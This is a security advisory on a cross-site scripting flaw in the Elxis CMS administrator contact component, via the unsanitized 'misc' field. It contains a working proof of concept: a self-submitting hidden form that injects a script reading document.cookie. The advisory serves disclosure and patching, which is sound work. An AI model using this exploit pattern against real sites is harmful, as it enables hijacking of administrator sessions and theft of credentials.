Vulnerability ID: HTB22615 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms_contacts.html Product: Elxis CMS Vendor: Elxis Team ( http://www.elxis.org/ ) Vulnerable Version: 2009.2 electra rev2631 and probably prior versions Vendor Notification: 20 September 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Fixed by Vendor Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "administrator/index2.php" script to properly sanitize user-supplied input in "misc" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://eecore/elxis/administrator/index2.php"; method="post" name="main" > <input type="hidden" name="catid" value="1" /> <input type="hidden" name="user_id" value="0" /> <input type="hidden" name="name" value="My Name" /> <input type="hidden" name="seotitle" value="sef-url" /> <input type="hidden" name="con_position" value="Website manager" /> <input type="hidden" name="email_to" value="webmaster@xxxxxxxxxxx" /> <input type="hidden" name="address" value="My address" /> <input type="hidden" name="suburb" value="city" /> <input type="hidden" name="state" value="reg" /> <input type="hidden" name="country" value="country" /> <input type="hidden" name="postcode" value="12345" /> <input type="hidden" name="telephone" value="123" /> <input type="hidden" name="fax" value="123" /> <input type="hidden" name="misc" value='hello"><script>alert(document.cookie)</script>' /> <input type="hidden" name="default_con" value="1" /> <input type="hidden" name="published" value="1" /> <input type="hidden" name="ordering" value="1" /> <input type="hidden" name="access" value="29" /> <input type="hidden" name="image" value="asterisk.png" /> <input type="hidden" name="params[menu_image]" value="-1" /><input type="hidden" name="params[menu_image_only]" value="0" /><input type="hidden" name="params[pageclass_sfx]" value="" /><input type="hidden" name="params[print]" value="" /><input type="hidden" name="params[back_button]" value="" /><input type="hidden" name="params[name]" value="1" /><input type="hidden" name="params[position]" value="1" /><input type="hidden" name="params[email]" value="0" /><input type="hidden" name="params[street_address]" value="1" /><input type="hidden" name="params[suburb]" value="1" /><input type="hidden" name="params[state]" value="1" /><input type="hidden" name="params[country]" value="1" /><input type="hidden" name="params[postcode]" value="1" /><input type="hidden" name="params[telephone]" value="1" /><input type="hidden" name="params[fax]" value="1" /><input type="hidden" name="params[misc]" value="1" /><input type="hidden" name="params[vcard]" value="1" /><input type="hidden" name=! "params[image]" value="1" /><input type="hidden" name="params[email_description]" value="1" /><input type="hidden" name="params[email_description_text]" value="" /><input type="hidden" name="params[email_form]" value="1" /><input type="hidden" name="params[email_copy]" value="1" /><input type="hidden" name="params[drop_down]" value="0" /><input type="hidden" name="params[contact_icons]" value="1" /><input type="hidden" name="params[icon_address]" value="" /><input type="hidden" name="params[icon_email]" value="" /><input type="hidden" name="params[icon_telephone]" value="" /><input type="hidden" name="params[icon_fax]" value="" /><input type="hidden" name="params[icon_misc]" value="" /> <input type="hidden" name="option" value="com_contact" /> <input type="hidden" name="id" value="1" /> <input type="hidden" name="task" value="save" /> </form> <script> document.main.submit(); </script> Solution: Upgrade to the most recent version
